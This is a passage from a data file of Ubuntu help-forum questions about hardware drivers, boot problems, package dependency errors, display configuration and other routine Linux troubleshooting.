option in the bios . even though the os is installed , i simply can not access it . i 'm becoming very worried about this , i need ubuntu for college , does anyone have any ideas on how to fix this ? ?
514373	overheating samsung ultra 5 530u ( fan not spinning at all )	i installed mint on the above mentioned ultrabook . even in idle the machine gets really hot really fast . it is almost not possible to touch in on the bottom . i tried using bumblebee but it does n't seem to work at all . i get the following error : [ 933.896850 ] [ error ] the bumblebee daemon has not been started yet or the socket path /var/run/bumblebee.socket was incorrect . [ 933.896916 ] [ error ] could not connect to bumblebee daemon - is it running ? i also tried following this guide : http : //tuxtweaks.com/2008/08/how-to-control-fan-speeds-in-ubuntu/ but when i run : sudo pwmconfig i get this error : # pwmconfig revision 6166 ( 2013-05-01 ) this program will search your sensors for pulse width modulation ( pwm ) controls , and test each one to see if it controls a fan on your motherboard . note that many motherboards do not have pwm circuitry installed , even if your sensor chip supports pwm . we will attempt to briefly stop each fan using the pwm controls . the program will attempt to restore each fan to full speed after testing . however , it is ** very important ** that you physically verify that the fans have been to full speed after the program has completed . /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed under windows 8 everything is running smoth . what wonders me the most is the fact , that the fan is n't spinning at all . under windows 8 i can hear it running . any suggestions are welcome ! edit : i made some progress . i added the option `` acpi=1 '' to /etc/default/grub . it now looks like this : grub_cmdline_linux_default= '' radeon.dpm=1 acpi=off '' grub_cmdline_linux= '' acpi=off '' that seems to let the laptop not to heat up to much . but the it seems like it doing it by slowing down the cpu . the whole device is running slower and the fan still is n't spinning . there seem to be no options in the bios to fix thix issue .
514374	keyboard backligth is set to maximum in every reboot	at every reboot my screen backlight and my keyboard backlight were set up to maximum level on every reboot . reading this article : how do i set default display brightness ? i 've solved the problem with my screen backligth running the script mentioned . but i still having problem with my keyboard backlight . i 've already modified with gksudo /etc/rc.local , writing on it : echo 0 > /sys/class/leds/asus\ : \ : kbd_backlight/brightness and also tryed : echo '0 ' > /sys/class/leds/asus\ : \ : kbd_backlight/brightness but when i restart the system the keyboardk backlight is set to max again . i 'm running ubuntu 14.04
514378	add a login screen on boot to lubuntu 14.04	so , i 've been using lubuntu for about three months now , and recently gor around to adding new users . what i was wondering is if there 's any way to add a login splash screen ( like the windows login screens ) on boot , so you have to select a user or guest to proceed . how do you do that ?
514381	alfa awus036h usb wireless adapter not recognized	the alfa awus036h usb wireless adapter will not be recognized by my netbook ( ubuntu 14.04 , asus x201e ) . as i understand it , the drivers should already be built in to this version of linux , but i tried a make/make install of the latest realtek drivers ( as mentioned on how do i install drivers for the alfa awus036h usb wireless adapter ? ) and it did n't work . i then followed the advice of this thread ( alfa awus036nh driver ) and did a make/make install of the most up-to-date backport of the drivers , but that did n't work . at this point i tried a series of commands from this thread ( http : //ubuntuforums.org/showthread.php ? t=2187780 ) in an attempt to identify the problem , but at no point could i get the laptop to ever recognize the usb adapter . i have also troubleshot the usb cable itself , tried both the usb 2.0 and 3.0 ports on the laptop , have never received an error message regarding a need to update the firmware , and have seemingly successfully installed all manner of variation of realtek drivers which were supposed to make the adapter work . ( i also tried to delete/clean up after each install , in the hope i was n't making things worse . ) not sure what i should do next . please let me know if i need to post any more information . thanks very much for your help . edit : before inserting alpha usb adapter : : ~ $ lsusb bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 0bda:570c realtek semiconductor corp . bus 001 device 026 : id 13d3:3393 imc networks bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 03f0:3112 hewlett-packard bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub after inserting alpha usb adapter ( usb 3.0 port , no change ) : : ~ $ lsusb bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 0bda:570c realtek semiconductor corp . bus 001 device 026 : id 13d3:3393 imc networks bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 03f0:3112 hewlett-packard bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub ran tail -f /var/log/syslog , inserted device , no recognition ( last entry is dated 16:17:01 , so an hour ago ) . going to check on an ubuntu 14.04 laptop and windows xp desktop . i 'll update after . thanks for your help to this point .
514384	problem installing g++ ccompiler on ubuntu 14.04	i tried to install g++ using packages from another user . offline..but there were errors . after connecting to the net i tried to install using sudo apt-get install g++ , but it gave the following output : gstreamer0.10-alsa is already the newest version . qtdeclarative5-ubuntu-ui-extras-browser-plugin is already the newest version . python-gconf is already the newest version . gstreamer0.10-tools is already the newest version . libglib2.0-0 is already the newest version . gir1.2-peas-1.0 is already the newest version . libatk-bridge2.0-0 is already the newest version . gnome-session-bin is already the newest version . libgomp1 is already the newest version . libmessaging-menu0 is already the newest version . usb-creator-gtk is already the newest version . libgnome-desktop-3-7 is already the newest version . software-properties-gtk is already the newest version . gnome-control-center-shared-data is already the newest version . unity-scope-gourmet is already the newest version . libcupsimage2 is already the newest version . growisofs is already the newest version . libjson-glib-1.0-common is already the newest version . activity-log-manager is already the newest version . libio-string-perl is already the newest version . qtdeclarative5-qtfeedback-plugin is already the newest version . gnome-power-manager is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . and many more lines like this ... .but g++ is still not installed
514390	error to run android eclipse on ubuntu	i downloaded adt-bundle-linux-x86_64-20131030 and it works well on my pc but now i want to run it on my laptop but it returns an error ! i installed wine but it did n't help actually this eclipse package is for linux here is the error :
514391	photography post processing : for slideshows to music	i am migrating from windows to linux and have a question about post processing software on linux : i already use gimp / g'mic and have a question regarding rather specialist bits of post processing . i prefer to use open source software as i think open source and communities of like minded people is a great way of sharing info ' and resources creating a slideshow to music on windows i use pictures2exe , a rather neat bit of software for producing slick audio visual slideshows to music . what do you advice as a linux / open source alternative ? i 'm not that geeky with linux i.e i use a ubuntu gui desktop interface and do n't do any command line scripts etc . many thanks in anticipation of your help regards phil
514393	how to run installation cd for second monitor ?	i am running ubuntu 14 off of a live usb . i have a second monitor that i would like to use while using ubuntu . it has an installation cd that you have to install before using , and when i click on the .exe file the archive manager tries to open it and says an error occurred while loading the archive . thanks for the help . edit : additional information it just does n't show up when when i 'm in the display settings area . i press the locate ( name is probably something else ) monitor button too . i know it needs the cd because when i was using it with windows it did n't work until i went through the installation process on the cd . if ubuntu does n't use .exe files is there a way to use the cd still ? monitor info from label : -acer lcd monitor -model number : s200hql version : s200hql bd i connect it to my computer using a vga cord which is connected to a j5create vga to usb adapter . not sure if this helps : vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) lsusb output : bus 002 device 004 : id 046d : c52f logitech , inc. unifying receiver bus 002 device 005 : id 0bc2:2100 seagate rss llc bus 002 device 007 : id 0711:5200 magic control technology corp . bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 1bcf:2c18 sunplus innovation technology inc . bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
514395	cairo-dock only shows one workspace after upgrade to 14.04 lts	i have a linux desktop that i try to keep up to date , although i do n't use it a lot . i had it configured with cairo-dock , showing 2x2 workspaces . it 's been like this for quite a while . i recently upgraded to 14.04 lts , and now the switcher only shows a single workspace . i read several posts that talk about similar problems , but i was n't able to get a viable clue . what can i look at to get some clues ?
514397	display not using xorg.conf ?	how can i force my pc to use the xorg.conf file ? i have it set up correctly and it is located at etc/x11/xorg.conf but it is ignored by at start up , i know the file is valid as i created it using nvidia-settings . i just do not know why it is been ignored . thanks for any help section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` vestel 40 fhd_lcd-tv '' horizsync 15.0 - 46.0 vertrefresh 49.0 - 61.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 650 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` 1920x1080_60 +0+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection
514398	ubuntu 12.04 will not connect to wifi	i am running ubuntu 12.04 . my wifi network is discoverable but when i try to connect it just continuously tries to connect and fails and asks for the password again every 5 minutes ! help !
514400	how to install ubuntu on 2 internal hard drives ?	my computer has two internal hard drives : sda is 80gb and sdb is 500gb . i want to install ubuntu on both drives with system files on sda and home directory on sdb . i need step by step instructions .
514403	14.04 : automatic-ubiquity use proxy	i 'm using automatic-ubiquity to install some machines . during installation language packages must be downloaded . the problem is , that the machines are behind a proxy . is there a way to set the proxy settings using the preseed-file ?
514407	wifi networks will not show up !	i 'm running ubuntu 14.04 on an old '08 macbook . i 've gone to system settings > software & updates > additional drivers and enabled the wireless driver . but when i click the wifi icon on the top toolbar no networks show up . when running lshw it clearly shows my wireless card under network controller and it says the driver is installed . however , nm-tool only shows ethernet . and rfkill only shows bluetooth . what can i do ?
514414	trying to compile from source newest apache with newest openssl	i need to install apache 2.4.10 using openssl 1.0.1i . i compiled openssl from source with : $ ./config \ -- prefix=/opt/openssl-1.0.1i \ -- openssldir=/opt/openssl-1.0.1i $ make $ sudo make install and apache with : ./configure -- prefix=/etc/apache2 \ -- enable-access_compat=shared \ -- enable-actions=shared \ -- enable-alias=shared \ -- enable-allowmethods=shared \ -- enable-auth_basic=shared \ -- enable-authn_core=shared \ -- enable-authn_file=shared \ -- enable-authz_core=shared \ -- enable-authz_groupfile=shared \ -- enable-authz_host=shared \ -- enable-authz_user=shared \ -- enable-autoindex=shared \ -- enable-dir=shared \ -- enable-env=shared \ -- enable-headers=shared \ -- enable-include=shared \ -- enable-log_config=shared \ -- enable-mime=shared \ -- enable-negotiation=shared \ -- enable-proxy=shared \ -- enable-proxy_http=shared \ -- enable-rewrite=shared \ -- enable-setenvif=shared \ -- enable-ssl=shared \ -- enable-unixd=shared \ -- enable-ssl \ -- with-ssl=/opt/openssl-1.0.1i \ -- enable-ssl-staticlib-deps \ -- enable-mods-static=ssl make ( would run sudo make install next but i get an error ) i 'm essentially following the guide here except with newer slightly newer versions . my problem is i get a linker error when i run make for apache : making all in support make [ 1 ] : entering directory `/home/developer/downloads/httpd-2.4.10/support' make [ 2 ] : entering directory `/home/developer/downloads/httpd-2.4.10/support' /usr/share/apr-1.0/build/libtool -- silent -- mode=link x86_64-linux-gnu-gcc -std=gnu99 -pthread -l/opt/openssl-1.0.1i/lib -lssl -lcrypto \ -o ab ab.lo /usr/lib/x86_64-linux-gnu/libaprutil-1.la /usr/lib/x86_64-linux-gnu/libapr-1.la -lm /usr/bin/ld : /opt/openssl-1.0.1i/lib/libcrypto.a ( dso_dlfcn.o ) : undefined reference to symbol 'dlclose @ @ glibc_2.2.5' i tried the answer here , but no luck . i would prefer to just use aptitude , but unfortunately the versions i need are n't available yet . if anyone knows how to fix the linker problem ( or what i think is a linker problem ) , or knows of a better way to tell apache to use a newer openssl , it would be greatly appreciated ; i 've got apache 1.0.1i working otherwise .
514415	trying to install ubuntu touch to nexus 4 - ca n't connect device ( 14.04 in virtual box on mac )	i 'm trying to install ubuntu touch to a nexus 4 . i 've followed all the steps so far , downloaded the packages and gotten the phone ready , but now i got to the step of connecting it to the computer [ under 'enable usb debugging ' ] , but it 's not listed when i try $ adb devices ( i tried the 'adb kill-server ' command first too , but nothing is listed ) . i 'm sure it 's something simple i 'm forgetting , but can anyone help please ? i have debugging enabled . running trusty in virtualbox on macbook . thanks !
514418	how to create an installer for a python gtk3 application ?	i have just finished developing a python 2.7 application using gtk3 for gui . my question is , how can i now create an installer for windows , mac , and linux ( possibly three different installers ) for my end-users to easily download the application without having to download python and gtk and such . i have never created an installer from a python script before . i have heard that are some tools for this purpose ( py2exe ? pyinstaller ? ) , but i would n't know how and what to pack with them in order for it to be able to use gtk3 .
514422	lan or workgroup with ubuntu server and windows clients	i have 35 windows 7 standalone computers right now and planning to setup a lan/workgroup using ubuntu as a server if it 's a lan . purpose for network : files from client computers to be accessed by me and vice versa through a shared folder on the server . files only include word documents and very small project files . the network wo n't have internet access at the moment . what i would like to know : how would i configure the ubuntu server to recognize the clients and will the clients be able to view the shared folders through their windows machines simultaneously ?
514423	windows 8.1 crash after restart	i have installed dual boot wind8.1 with ubuntu 14.04. when i turn on the computer from a complete shut down status , everything is alright and i can access both win 8.1 and ubuntu from grub . but when i restart from win or ubuntu , if i choose win in grub menu , the system crashes without even entering the windows welcome screen ! it just stays on a dark messed up page and i have to shutdown the system by keeping the power button . i tried to reinstall ubuntu and also using boot-repair , non worked !
514424	does not see win7	im trying to install ubuntu on a machine currently running win7 , ubuntu is telling me that there is no operating system currently installed , then asks me how i want to partition the drive . i 've done this before without a problem . the difference is those were 32 bit machines , this is a 64 bit . i 'm seeing the problem as an ubuntu install issue , maybe i am mistaken though . has this been encountered before ? any ideas on the work around ?
514426	ubuntu cursor theme only works in certain programs	i just installed oxygen cursor theme from kde plasma yet when i change the theme it only changes when using programs such as firefox , how can i set a theme as default ? thank you !
514427	battery discharges while computer is off	i bought a hp 15-r003np 2 weeks ago and installed ubuntu 14.04 lts with dual boot ( to windows 8 ) . when i shutdown ubuntu , in the next day battery has 85 % of charge , despite the computer shutdown . if i power off in windows battery charge is 100 % in the next day . does anyone have noticed the same problem ? i think the network adapter is not on wol mode , seen via windows network config properties . i need help to solve this problem ... ( it 's not right to work around restarting to windows to do the shutdown properly ... )
514430	radeon r7 m260 & proprietary drivers : bad performance	i recently bought a dell inspiron 5547 laptop and installed ubuntu 14.04 on it . almost everything worked great out of the box . this laptop comes with two graphic cards , an intel hd graphics 4400 and an amd r7 m260 . the intel card works as expected , apart from the occasional tear when scrolling or moving a window around . here 's the output from lspci : 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 0b ) 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 0b ) 00:03.0 audio device : intel corporation haswell-ult hd audio controller ( rev 0b ) 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation lynx point-lp pci express root port 3 ( rev e4 ) 00:1c.3 pci bridge : intel corporation lynx point-lp pci express root port 4 ( rev e4 ) 00:1c.4 pci bridge : intel corporation lynx point-lp pci express root port 5 ( rev e4 ) 00:1d.0 usb controller : intel corporation lynx point-lp usb ehci # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 07 ) 02:00.0 network controller : qualcomm atheros qca9565 / ar9565 wireless network adapter ( rev 01 ) 03:00.0 display controller : advanced micro devices , inc. [ amd/ati ] topaz xt [ radeon r7 m260 ] i was able to install amd 's catalyst from the ubuntu repositories and following these instructions from the amd linux community 's wiki . i can run x , and i can even switch between the two cards . however , the performance is terrible with the amd card . moving windows around causes a lot of tearing , resizing windows is slow and even scrolling down a page on firefox is slow . dota 2 runs at a low fps and ugly , whereas i can run it perfectly using the intel 4400 , which is much less powerful . just for the record , i installed both the stable ( 14.4 ) and the beta ( 14.6 ) drivers . i tried many workarounds , such as amdconfig -- sync-video=on and other xorg.conf options i found on the arch linux wiki . nothing worked , and the graphics card always performed poorly . here 's my current xorg.conf : section `` serverlayout '' identifier `` amd-layout '' screen 0 `` amd-screen '' 0 0 endsection section `` device '' identifier `` intel '' driver `` intel '' option `` accelmethod '' `` uxa '' busid `` pci:0 @ 0:2:0 '' endsection section `` device '' identifier `` amd-device '' driver `` fglrx '' busid `` pci:3:0:0 '' endsection section `` monitor '' identifier `` amd-monitor '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` screen '' identifier `` amd-screen '' device `` amd-device '' monitor `` amd-monitor '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection notebookcheck has some interesting information on my graphics card : just like the older radeon hd 8700m and 8600m series , it is based on the mars chip ( 28nm gcn architecture ) with 384 shader cores , 24 tmus and 8 rops . according to this page , all radeonhd 7000-series and 8000-series are supported by the catalyst . since the r7 m260 is newer than the 8000-series ( or so it seems ) , i assume it is supported by catalyst . on the other hand , the card may be just too new and not yet supported on linux ( would n't surprise me ) . according to wikipedia , the r7 m260 was launched in june 2014 . is there anything i 'm overlooking or could try to get a better performance out of the card ? have you had any similar problems ? if you need more information , please let me know and i 'll update this post .
514431	how to share internet connection and making the client accessible over the lan	i 've a pc with ubuntu 14.04 connected to a linkys router through wlan0 , and i 'd like to share internet connection to an avr with ethernet port . this is pretty simple if only internet connection is required for the avr : actually , creating an ethernet connection as `` shared with other computers '' and setting up the avr ip configuration to use dhcp works just fine , but that makes a private class a lan between those two ; of course ip addresses are not in the range of the lan the router is managing . so , i tried with static ip on both sides ( ubuntu eth0 and avr ip ) . tried many combinations , none of them work to provide internet access to the avr and at the same time make the avr accessible over the network through his static ip address ( say , 192.168.0.110 ) . any tips around to share ? ?
514432	desktop compositing issues with gtx 690 and kubuntu 14.04	i 'm having a bit of trouble with kubuntu 14.04 on my desktop . i have a gtx 690 with the nvidia 331 drivers installed ( through the driver manager ) . whenever i boot into kubuntu , i 'm met with terrible screen tearing artifacts when moving windows . forcing full-screen repaints does not fix the problem . when i go to look at the desktop render settings , they are by default set to opengl 2.0 . changing to a different opengl version immediately fixes the problem . however , after rebooting , the same problem exists , and i must go into the settings and change the opengl version to something different again . and curiously enough , changing to a different opengl version , then changing back , fixes the problem as well . i should note that this problem does not happen with the same os on my laptop with intel hd graphics , and that other uis/compositing managers do not show this problem on my desktop with the same drivers , so i think it 's unique to kde . i was wondering if anybody knew of a way to fix this problem once and for all , so i do n't have to keep changing the opengl version each boot . or at the very least , create a script that would perform this task at boot automatically .
514433	screen goes blank after undocking	for some reason since yesterday completely working system ca n't work without dockstation : screen goes blank , but everything else works . i still can login as guest and everything will work fine , or switch with ctrl-alt-fsomething to terminal session , but as soon as i start session ( with xstart , for example ) with my user after appearance of the first icon in the default kubuntu bootloader screen goes blank . i thought the issue might have been in external monitor , but even if i turn it off in `` displays '' and leave only notebook screen it still goes blank after undocking . the only difference yesterday was replacement of external monitor , but i ca n't see how this may change anything . kubuntu 14.04 , dell - latitude e6330
514434	how to record chrome cpu and memory usage	is it possible to record google-chromes cpu and ram usage ? ? with terminal or other software that will do the same task ? ? thank you in advance
514436	nvidia driver versions ?	i 've looked all over and ca n't find any reason as to why or how nvidia names their drivers . for example they have a 330.xxx/340.xxx series that are current but also a 300.xxx and i 've found that they are n't always release in order by number . here 's an example on there site with version and release date 331.38 - january 13 334.16 - feb 7 331.49 - feb 18 i 'm really confused about what driver to actually go with , a few different series versions seem to work adequately and i just want to have an understanding of it and what the best option to work from would be . i really appreciate any information
514437	i removed windows 8 and installed ubuntu 14.04 , now my fn keys to manage brightness and volume do n't work and i ca n't boot into bios	to clarify , this is n't a dual-boot , i just have ubuntu now . my fn keys are no longer working on my asus k55n , this includes changing my brightness and volume . i 've already tried editing the grub file and adding acpi_osi=linux acpi_backlight=vendo , but that did n't work . i also ca n't boot into my bios anymore . i 've restarted my laptop and tried pressing f2 , del , esc , f10 , and f8 and nothing works . it just loads straight to ubuntu everytime , any ideas ?
514438	dpkg unsatisfied dependencies , now apt-get wants to remove whole system	firstly , i 'm sorry for my terminal output in portuguese , but i guess it is still understandable . i am using ubuntu gnome 14.04 and i tried to update the gnome online accounts packages by downloading the following .deb files from packages.ubuntu.com for the ubuntu 14.10 version : libgoa-backend-1.0-dev_3.12.4-1_amd64.deb libgoa-backend-1.0-1_3.12.4-1_amd64.deb libgoa-1.0-dev_3.12.4-1_amd64.deb libgoa-1.0-0b_3.12.4-1_amd64.deb gnome-online-accounts_3.12.4-1_amd64.deb gir1.2-goa-1.0_3.12.4-1_amd64.deb after downloading them in the same folder , i run the command sudo dpkg -i *.deb , but it did n't install the packages , instead it showed errors due to packages which them depend does n't meet the required version ( and ubuntu have no way to install them since they are not in this version 's repositories ) . so now every time i want to install anything through apt-get , ubuntu tells me to run apt-get -f install to fix the errors . this is the list of packages it needs to install/uninstall/update : $ sudo apt-get -f install lendo listas de pacotes ... pronto construindo árvore de dependências lendo informação de estado ... pronto corrigindo dependências ... pronto os seguintes pacotes foram instalados automaticamente e já não são necessários : # these packages have been previously installed and are no longer necessary account-plugin-windows-live gir1.2-gweather-3.0 libatk-bridge2.0-dev libatk1.0-dev libcairo-script-interpreter2 libcairo2-dev libexpat1-dev libfontconfig1-dev libfreetype6-dev libgdk-pixbuf2.0-dev libglib2.0-dev libgtk-3-dev libharfbuzz-dev libharfbuzz-gobject0 libice-dev libpango1.0-dev libpcre3-dev libpcrecpp0 libpixman-1-dev libpng12-dev libpthread-stubs0-dev librest-dev libsm-dev libsoup2.4-dev libwayland-dev libx11-dev libx11-doc libxau-dev libxcb-render0-dev libxcb-shm0-dev libxcb1-dev libxcomposite-dev libxcursor-dev libxdamage-dev libxdmcp-dev libxext-dev libxfixes-dev libxft-dev libxi-dev libxinerama-dev libxkbcommon-dev libxml2-dev libxrandr-dev libxrender-dev pkg-config signon-plugin-password x11proto-composite-dev x11proto-core-dev x11proto-damage-dev x11proto-fixes-dev x11proto-input-dev x11proto-kb-dev x11proto-randr-dev x11proto-render-dev x11proto-xext-dev x11proto-xinerama-dev xorg-sgml-doctools xtrans-dev zlib1g-dev utilize 'apt-get autoremove ' para os remover . os pacotes extra a seguir serão instalados : # the following packages will be installed debhelper dh-apparmor libatk-bridge2.0-dev libatk1.0-dev libcairo-script-interpreter2 libcairo2-dev libept1.4.12 libexpat1-dev libfontconfig1-dev libfreetype6-dev libgdk-pixbuf2.0-dev libglib2.0-dev libgtk-3-dev libharfbuzz-dev libharfbuzz-gobject0 libice-dev libmail-sendmail-perl libpango1.0-dev libpcre3-dev libpcrecpp0 libpixman-1-dev libpng12-dev libpthread-stubs0-dev librest-dev libsm-dev libsoup2.4-dev libwayland-dev libx11-dev libx11-doc libxau-dev libxcb-render0-dev libxcb-shm0-dev libxcb1-dev libxcomposite-dev libxcursor-dev libxdamage-dev libxdmcp-dev libxext-dev libxfixes-dev libxft-dev libxi-dev libxinerama-dev libxkbcommon-dev libxml2-dev libxrandr-dev libxrender-dev pkg-config po-debconf x11proto-composite-dev x11proto-core-dev x11proto-damage-dev x11proto-fixes-dev x11proto-input-dev x11proto-kb-dev x11proto-randr-dev x11proto-render-dev x11proto-xext-dev x11proto-xinerama-dev xorg-sgml-doctools xtrans-dev zlib1g-dev pacotes sugeridos : dh-make apparmor-easyprof libcairo2-doc libglib2.0-doc libgtk-3-doc libice-doc libpango1.0-doc imagemagick libsm-doc libsoup2.4-doc libxcb-doc libxext-doc libmail-box-perl os pacotes a seguir serão removidos : # the following packages will be removed account-plugin-aim account-plugin-jabber account-plugin-salut account-plugin-yahoo empathy evolution evolution-data-server evolution-data-server-online-accounts evolution-indicator evolution-plugins gdm gir1.2-gdata-0.0 gir1.2-goa-1.0 gir1.2-zpj-0.0 gnome-contacts gnome-control-center gnome-documents gnome-online-accounts gnome-online-miners gnome-shell gnome-shell-extension-weather gnome-shell-extensions grilo-plugins-0.2 gvfs-backends-goa libevolution libfolks-eds25 libgdata13 libgoa-1.0-0b libgoa-1.0-dev libgoa-backend-1.0-1 libgoa-backend-1.0-dev libzapojit-0.0-0 mcp-account-manager-uoa nautilus-sendto-empathy ubuntu-gnome-desktop os novos pacotes a seguir serão instalados : # the new following packages will be installed debhelper dh-apparmor libatk-bridge2.0-dev libatk1.0-dev libcairo-script-interpreter2 libcairo2-dev libept1.4.12 libexpat1-dev libfontconfig1-dev libfreetype6-dev libgdk-pixbuf2.0-dev libglib2.0-dev libgtk-3-dev libharfbuzz-dev libharfbuzz-gobject0 libice-dev libmail-sendmail-perl libpango1.0-dev libpcre3-dev libpcrecpp0 libpixman-1-dev libpng12-dev libpthread-stubs0-dev librest-dev libsm-dev libsoup2.4-dev libwayland-dev libx11-dev libx11-doc libxau-dev libxcb-render0-dev libxcb-shm0-dev libxcb1-dev libxcomposite-dev libxcursor-dev libxdamage-dev libxdmcp-dev libxext-dev libxfixes-dev libxft-dev libxi-dev libxinerama-dev libxkbcommon-dev libxml2-dev libxrandr-dev libxrender-dev pkg-config po-debconf x11proto-composite-dev x11proto-core-dev x11proto-damage-dev x11proto-fixes-dev x11proto-input-dev x11proto-kb-dev x11proto-randr-dev x11proto-render-dev x11proto-xext-dev x11proto-xinerama-dev xorg-sgml-doctools xtrans-dev zlib1g-dev 0 pacotes atualizados , 61 pacotes novos instalados , 35 a serem removidos e 22 não atualizados . 7 pacotes não totalmente instalados ou removidos . é preciso baixar 12,0 mb de arquivos . depois desta operação , 25,0 mb adicionais de espaço em disco serão usados . você quer continuar ? [ s/n ] along packages needed to be removed are even gdm . this is 100 % sure to make the system useless . what can i do to fix this issue ? i do n't care if i ca n't install the new version of goa anymore .
514440	skye videocall upside down	i 'm have installed ubuntu 14.04 64bit on an asus k50fa and when i use the webcam on skype the video is upside down and on cheese is working fine . the webcam is the one build in with the laptop can some one help me please
514444	i installed ubuntu 14.04.1 , after installation the computer boots back to installion page	i have installed ubuntu 14.04.1 on my toshiba . the installion was successful and was required to be restarted . after the restart i am brought back to the gnu installation page . the only option i have is to either try ubuntu as a live user , or install again . if i try to install again , the system recognizes that ubuntu 14.04.1 is already installed . before i had installed ubuntu i had changed the boot sequence to start on usb . this is no longer needed after installation . does anyone know how to change the boot sequence , so ubuntu can load from the hdd and not the usb ? ? thank you !
514445	ca n't use graphical interface after installing ubuntu 14.04 server	after installing 14.04 server , how could i get out from terminal and go to graphical ?
514448	qt applications indicator and appmenu do n't work / ubuntu 14.04	i 'm not sure when this happened , but form yesterday , i found my vlc player 's indicator and appmenu dont work . there is no indicator icons and appmenu doenst appears on the top bar . not only vlc but also skype or any other qt applications , apps with gtk is ok . i 've tried to reinstall vlc and skype even sni-qt , still no change.do n't know how to handle this . ubuntu 14.04 64bit
514450	programs never open in foreground	why do n't programs open in the foreground ? how can i change this behavior ? nautilus will open in the background , remmina ( the remote desktop program ) also opens in the background . i have to click on the icon in the launcher for it to come to the foreground . i would think any program that is invoked by any means would come to front , as it opens . it seems if one program invokes another , it will be in the background . if i click on any icons in the launcher though , it will actually open in the foreground .
514451	new hdd formating on ext4 root permission	i have this new 80gb hdd i want to use it as a backup storage for my actual system ( 14.04 ) not a server . i formatted it with gpart but i just ca n't write in it , when i search for permissions it tells me that only root users can write/create in it , log on as root user and try to change permissions , and i ca n't do that either . long have i searched for an answer , looking everywhere but not to find any , is there a way to format it and use it with my user permission ? do n't want it on ntfs , is there a way ? , i have searched in these forums but thereâs only an answer to format it in ntfs .
514452	can i use dial up modem to connect to internet while installing ubuntu 14.04 ?	can i use dial up modem to connect to internet while installing ubuntu ? i use huawei ec156 modem to connect to the internet .
514453	windows 8 ubuntu installation	i 'm currently attempting to install ubuntu on my desktop via the desktop installer iso . windows 8 is my current os , could anyone help me install ubuntu , as windows 8 is stopping me from doing so ?
514454	why does dpkg status file get corrupted	i have had over the past 2 weeks 3 times a problem with the /var/lib/dpkg/status file . i normally grab the `` old '' version or edit the file to clean it from corruption , but i wanted to know , what reasons exist that could make the status file get corrupted . some examples are : finding many nul messages in it in one of the properties for each package . missing a comma or a semi colon . missing some parts of the properties for a package . finding only @ @ @ symbols in the file . finding the file completely empty or with a dot inside of it . so what scenarios exist that could corrupt this particular file . i have seeing more than 10+ ways of fixing it , but none exist that explain why it gets corrupted in the first place .
514455	unable to change host name on ubuntu virtual machine	here are the steps i followed : changed /etc/hosts : cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 linux-vm change etc/hostname cat /etc/hostname linux-vm reboot still the tty shows the old hostname : how can i change it permanently ?
